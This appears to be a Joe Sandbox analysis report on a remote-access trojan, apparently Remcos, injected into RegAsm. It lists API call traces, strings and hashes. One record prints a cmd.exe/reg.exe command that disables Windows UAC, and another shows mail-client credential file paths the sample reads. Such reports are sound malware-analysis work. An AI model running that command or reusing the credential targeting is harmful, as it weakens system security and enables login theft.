                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 221034970-0
                                                                                                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                                                                                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                                                                                                                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                                          • Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                          • Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
                                                                                                                          • Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
                                                                                                                          • Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                          • String ID: 0$MsgWindowClass
                                                                                                                          • API String ID: 2877667751-2410386613
                                                                                                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                          Strings
                                                                                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandle$CreateProcess
                                                                                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                          • API String ID: 2922976086-4183131282
                                                                                                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                          APIs
                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                          • String ID: KeepAlive | Disabled
                                                                                                                          • API String ID: 2993684571-305739064
                                                                                                                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                          • String ID: Alarm triggered
                                                                                                                          • API String ID: 614609389-2816303416
                                                                                                                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                          • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                                                          Strings
                                                                                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                          • API String ID: 3024135584-2418719853
                                                                                                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                          APIs
                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                                          • _free.LIBCMT ref: 0044943D
                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                          • _free.LIBCMT ref: 00449609
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1286116820-0
                                                                                                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2180151492-0
                                                                                                                          • Opcode ID: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                          • Opcode Fuzzy Hash: 50254459e3ae93045f6dbd6e6e7947e0bfa4b0136177b8b2dd2d26406979134f
                                                                                                                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 269201875-0
                                                                                                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                          • __freea.LIBCMT ref: 0045129D
                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 313313983-0
                                                                                                                          • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                          • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                          • _free.LIBCMT ref: 0044F43F
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 336800556-0
                                                                                                                          • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                          • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                          APIs
                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                          • _free.LIBCMT ref: 100071B8
                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.924918223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.924923884.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 336800556-0
                                                                                                                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                                          • _free.LIBCMT ref: 00448353
                                                                                                                          • _free.LIBCMT ref: 0044837A
                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 0000000E.00000002.923500657.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3170660625-0
                                                                                                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                          • _free.LIBCMT ref: 10005BB4
                                                                                                                          • _free.LIBCMT ref: 10005BDB
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000E.00000002.924923884.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
